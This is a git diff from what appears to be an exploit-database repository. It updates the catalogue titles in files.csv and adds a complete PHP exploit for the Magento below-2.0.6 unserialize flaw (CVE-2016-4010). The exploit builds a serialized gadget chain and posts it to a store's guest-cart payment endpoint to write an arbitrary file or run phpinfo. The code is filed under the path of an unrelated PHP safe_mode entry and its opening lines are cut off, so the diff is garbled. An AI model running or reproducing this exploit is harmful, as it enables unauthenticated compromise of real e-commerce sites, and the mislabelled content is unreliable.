diff --git a/files.csv b/files.csv index 0bf0d24c3..db035f2d5 100755 --- a/files.csv +++ b/files.csv @@ -5247,7 +5247,7 @@ id,file,description,date,author,platform,type,port 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 - (RFIi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0 -5622,platforms/linux/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22 +5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (RFI/rfd/SQL/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0 @@ -5257,7 +5257,7 @@ id,file,description,date,author,platform,type,port 5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0 -5632,platforms/linux/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22 +5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0 5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0 @@ -5344,7 +5344,7 @@ id,file,description,date,author,platform,type,port 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability",2008-06-01,KnocKout,asp,webapps,0 5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0 5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0 -5720,platforms/linux/remote/5720.py,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 +5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x - BlindSQL Injection Exploit",2008-06-02,His0k4,php,webapps,0 5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0 5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0 @@ -18544,9 +18544,9 @@ id,file,description,date,author,platform,type,port 21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service Vulnerability",2002-01-31,"Luca Papotti",unix,dos,0 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service Vulnerability",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0 21263,platforms/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting Vulnerability",2002-02-04,superpetz,cgi,remote,0 -21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0 -21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0 -21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3)",2002-02-03,anonymous,php,remote,0 +21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0 +21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0 +21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (3)",2002-02-03,anonymous,php,remote,0 21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - CSRF Add Admin Exploit",2012-09-12,LiquidWorm,php,webapps,0 21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilitie/ Reverse Root Shell Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0 21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart Arbitrary File Deletion Vulnerability",2012-09-12,JIKO,php,webapps,0 @@ -33855,7 +33855,7 @@ id,file,description,date,author,platform,type,port 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN launchAgent.do return-To Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN fileSystem.do Multiple Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - File Upload Vulnerability",2015-07-07,"TUNISIAN CYBER",php,webapps,80 -37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80 +37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80 37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0 37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900 37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service Vulnerability",2012-07-18,t3rm!n4t0r,multiple,dos,0 @@ -35851,7 +35851,7 @@ id,file,description,date,author,platform,type,port 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x - 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,metasploit,java,remote,8080 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 -39645,platforms/multiple/remote/39645.php,"PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 +39645,platforms/multiple/remote/39645.php,"PHP <= 5.5.33 / <= 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)",2016-04-01,"evait security GmbH",php,webapps,80 39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 39648,platforms/windows/dos/39648.txt,"Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 @@ -36023,3 +36023,4 @@ id,file,description,date,author,platform,type,port 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption Vulnerability",2016-05-17,"Google Security Research",multiple,dos,0 39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0 +39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80 diff --git a/platforms/php/remote/21264.php b/platforms/php/remote/21264.php index c30c0fca2..41218bbaa 100755 --- a/platforms/php/remote/21264.php +++ b/platforms/php/remote/21264.php @@ -1,10 +1,11 @@ + arbitrary write file +// Date: 18/05/206 +// Exploit Author: agix (discovered by NETANEL RUBIN) +// Vendor Homepage: https://magento.com +// Version: < 2.0.6 +// CVE : CVE-2016-4010 + +// to get a valid guestCartId +// * add an item in your cart +// * go to checkout +// * fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts//shipping-information +// (* in the response check the payment method it may vary from checkmo) +// +// If you didn\'t provide whereToWrite, it will execute phpinfo to leak path. + + +class Magento_Framework_Simplexml_Config_Cache_File extends DataObject +{ + function __construct($data){ + $this->_data = $data; + } +} + +class Credis_Client{ + const TYPE_STRING = 'string'; + const TYPE_LIST = 'list'; + const TYPE_SET = 'set'; + const TYPE_ZSET = 'zset'; + const TYPE_HASH = 'hash'; + const TYPE_NONE = 'none'; + const FREAD_BLOCK_SIZE = 8192; + + /** + * Socket connection to the Redis server or Redis library instance + * @var resource|Redis + */ + protected $redis; + protected $redisMulti; + + /** + * Host of the Redis server + * @var string + */ + protected $host; + + /** + * Port on which the Redis server is running + * @var integer + */ + protected $port; + + /** + * Timeout for connecting to Redis server + * @var float + */ + protected $timeout; + + /** + * Timeout for reading response from Redis server + * @var float + */ + protected $readTimeout; + + /** + * Unique identifier for persistent connections + * @var string + */ + protected $persistent; + + /** + * @var bool + */ + protected $closeOnDestruct = TRUE; + + /** + * @var bool + */ + protected $connected = TRUE; + + /** + * @var bool + */ + protected $standalone; + + /** + * @var int + */ + protected $maxConnectRetries = 0; + + /** + * @var int + */ + protected $connectFailures = 0; + + /** + * @var bool + */ + protected $usePipeline = FALSE; + + /** + * @var array + */ + protected $commandNames; + + /** + * @var string + */ + protected $commands; + + /** + * @var bool + */ + protected $isMulti = FALSE; + + /** + * @var bool + */ + protected $isWatching = FALSE; + + /** + * @var string + */ + protected $authPassword; + + /** + * @var int + */ + protected $selectedDb = 0; + + /** + * Aliases for backwards compatibility with phpredis + * @var array + */ + protected $wrapperMethods = array('delete' => 'del', 'getkeys' => 'keys', 'sremove' => 'srem'); + + /** + * @var array + */ + protected $renamedCommands; + + /** + * @var int + */ + protected $requests = 0; + + + public function __construct($resource) { + $this->redis = new Magento_Sales_Model_Order_Payment_Transaction($resource); + } +} + +class DataObject +{ + /** + * Object attributes + * + * @var array + */ + protected $_data = []; + + /** + * Setter/Getter underscore transformation cache + * + * @var array + */ + protected static $_underscoreCache = []; +} + +abstract class AbstractModel2 extends DataObject +{ + /** + * Prefix of model events names + * + * @var string + */ + protected $_eventPrefix = 'core_abstract'; + + /** + * Parameter name in event + * + * In observe method you can use $observer->getEvent()->getObject() in this case + * + * @var string + */ + protected $_eventObject = 'object'; + + /** + * Name of object id field + * + * @var string + */ + protected $_idFieldName = 'id'; + + /** + * Data changes flag (true after setData|unsetData call) + * @var $_hasDataChange bool + */ + protected $_hasDataChanges = false; + + /** + * Original data that was loaded + * + * @var array + */ + protected $_origData; + + /** + * Object delete flag + * + * @var bool + */ + protected $_isDeleted = false; + + /** + * Resource model instance + * + * @var \Magento\Framework\Model\ResourceModel\Db\AbstractDb + */ + protected $_resource; + + /** + * Resource collection + * + * @var \Magento\Framework\Model\ResourceModel\Db\Collection\AbstractCollection + */ + protected $_resourceCollection; + + /** + * Name of the resource model + * + * @var string + */ + protected $_resourceName; + + /** + * Name of the resource collection model + * + * @var string + */ + protected $_collectionName; + + /** + * Model cache tag for clear cache in after save and after delete + * + * When you use true - all cache will be clean + * + * @var string|array|bool + */ + protected $_cacheTag = false; + + /** + * Flag which can stop data saving after before save + * Can be used for next sequence: we check data in _beforeSave, if data are + * not valid - we can set this flag to false value and save process will be stopped + * + * @var bool + */ + protected $_dataSaveAllowed = true; + + /** + * Flag which allow detect object state: is it new object (without id) or existing one (with id) + * + * @var bool + */ + protected $_isObjectNew = null; + + /** + * Validator for checking the model state before saving it + * + * @var \Zend_Validate_Interface|bool|null + */ + protected $_validatorBeforeSave = null; + + /** + * Application Event Dispatcher + * + * @var \Magento\Framework\Event\ManagerInterface + */ + protected $_eventManager; + + /** + * Application Cache Manager + * + * @var \Magento\Framework\App\CacheInterface + */ + protected $_cacheManager; + + /** + * @var \Magento\Framework\Registry + */ + protected $_registry; + + /** + * @var \Psr\Log\LoggerInterface + */ + protected $_logger; + + /** + * @var \Magento\Framework\App\State + */ + protected $_appState; + + /** + * @var \Magento\Framework\Model\ActionValidator\RemoveAction + */ + protected $_actionValidator; + + /** + * Array to store object's original data + * + * @var array + */ + protected $storedData = []; +} + +abstract class AbstractExtensibleModel extends AbstractModel2 +{ + protected $extensionAttributesFactory; + + /** + * @var \Magento\Framework\Api\ExtensionAttributesInterface + */ + protected $extensionAttributes; + + /** + * @var AttributeValueFactory + */ + protected $customAttributeFactory; + + /** + * @var string[] + */ + protected $customAttributesCodes = null; + + /** + * @var bool + */ + protected $customAttributesChanged = false; + +} + +abstract class AbstractModel extends AbstractExtensibleModel +{ +} + +class Magento_Sales_Model_Order_Payment_Transaction extends AbstractModel +{ + /**#@+ + * Supported transaction types + * @var string + */ + const TYPE_PAYMENT = 'payment'; + + const TYPE_ORDER = 'order'; + + const TYPE_AUTH = 'authorization'; + + const TYPE_CAPTURE = 'capture'; + + const TYPE_VOID = 'void'; + + const TYPE_REFUND = 'refund'; + + /**#@-*/ + + /** + * Raw details key in additional info + */ + const RAW_DETAILS = 'raw_details_info'; + + /** + * Order instance + * + * @var \Magento\Sales\Model\Order\Payment + */ + protected $_order = null; + + /** + * Parent transaction instance + * @var \Magento\Sales\Model\Order\Payment\Transaction + */ + protected $_parentTransaction = null; + + /** + * Child transactions, assoc array of transaction_id => instance + * + * @var array + */ + protected $_children = null; + + /** + * Child transactions, assoc array of txn_id => instance + * Filled only in case when all child transactions have txn_id + * Used for quicker search of child transactions using isset() as opposite to foreaching $_children + * + * @var array + */ + protected $_identifiedChildren = null; + + /** + * Whether to perform automatic actions on transactions, such as auto-closing and putting as a parent + * + * @var bool + */ + protected $_transactionsAutoLinking = true; + + /** + * Whether to throw exceptions on different operations + * + * @var bool + */ + protected $_isFailsafe = true; + + /** + * Whether transaction has children + * + * @var bool + */ + protected $_hasChild = null; + + /** + * Event object prefix + * + * @var string + * @see \Magento\Framework\Model\AbstractModel::$_eventPrefix + */ + protected $_eventPrefix = 'sales_order_payment_transaction'; + + /** + * Event object prefix + * + * @var string + * @see \Magento\Framework\Model\AbstractModel::$_eventObject + */ + protected $_eventObject = 'order_payment_transaction'; + + /** + * Order website id + * + * @var int + */ + protected $_orderWebsiteId = null; + + /** + * @var \Magento\Sales\Model\OrderFactory + */ + protected $_orderFactory; + + /** + * @var \Magento\Framework\Stdlib\DateTime\DateTimeFactory + */ + protected $_dateFactory; + + /** + * @var TransactionFactory + */ + protected $_transactionFactory; + + /** + * @var \Magento\Sales\Api\OrderPaymentRepositoryInterface + */ + protected $orderPaymentRepository; + + /** + * @var \Magento\Sales\Api\OrderRepositoryInterface + */ + protected $orderRepository; + + /** + * @param \Magento\Framework\Model\Context $context + * @param \Magento\Framework\Registry $registry + * @param \Magento\Framework\Api\ExtensionAttributesFactory $extensionFactory + * @param AttributeValueFactory $customAttributeFactory + * @param \Magento\Sales\Model\OrderFactory $orderFactory + * @param \Magento\Framework\Stdlib\DateTime\DateTimeFactory $dateFactory + * @param TransactionFactory $transactionFactory + * @param \Magento\Framework\Model\ResourceModel\AbstractResource $resource + * @param \Magento\Framework\Data\Collection\AbstractDb $resourceCollection + * @param array $data + * @SuppressWarnings(PHPMD.ExcessiveParameterList) + */ + public function __construct($resource) { + $this->_resource = $resource; + } +} + +class Magento_Framework_DB_Transaction{ + protected $_objects = []; + + /** + * Transaction objects array with alias key + * + * @var array + */ + protected $_objectsByAlias = []; + + /** + * Callbacks array. + * + * @var array + */ + protected $_beforeCommitCallbacks = ["phpinfo"]; +} + +if(count($argv) < 3){ + echo 'Usage: '.$argv[0].' (whereToWrite)'.chr(0x0a); + echo 'To get a valid guestCartId'.chr(0x0a); + echo '* add an item in your cart'.chr(0x0a); + echo '* go to checkout'.chr(0x0a); + echo '* fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts//shipping-information'.chr(0x0a); + echo '(* in the response check the payment method it may vary from "checkmo")'.chr(0x0a).chr(0x0a); + echo 'If you didn\'t provide whereToWrite, it will execute phpinfo to leak path.'.chr(0x0a); + exit(); +} + +if(count($argv) === 4){ + $data = []; + $data['is_allowed_to_save'] = True; + $data['stat_file_name'] = $argv[3]; + $data['components'] = ''; + $resource = new Magento_Framework_Simplexml_Config_Cache_File($data); +} +else{ + $resource = new Magento_Framework_DB_Transaction(); +} + +$redis = new Credis_Client($resource); +$serialized = serialize($redis); + +$payload = json_decode('{"paymentMethod":{"method":"checkmo", "additional_data":{"additional_information":""}}, "email": "valid@magento.com"}'); + +$payload->paymentMethod->additional_data->additional_information = str_replace('Magento_Framework_DB_Transaction', 'Magento\\Framework\\DB\\Transaction', str_replace('Magento_Sales_Model_Order_Payment_Transaction', 'Magento\\Sales\\Model\\Order\\Payment\\Transaction', str_replace('Magento_Framework_Simplexml_Config_Cache_File', 'Magento\\Framework\\Simplexml\\Config\\Cache\\File', $serialized))); + +for($i=0; $i<2; $i++){ + $c = curl_init($argv[1].'/rest/V1/guest-carts/'.$argv[2].'/set-payment-information'); + curl_setopt($c, CURLOPT_HTTPHEADER, array('Content-Type: application/json')); + curl_setopt($c, CURLOPT_POSTFIELDS, json_encode($payload)); + curl_exec($c); + curl_close($c); +} + +?> \ No newline at end of file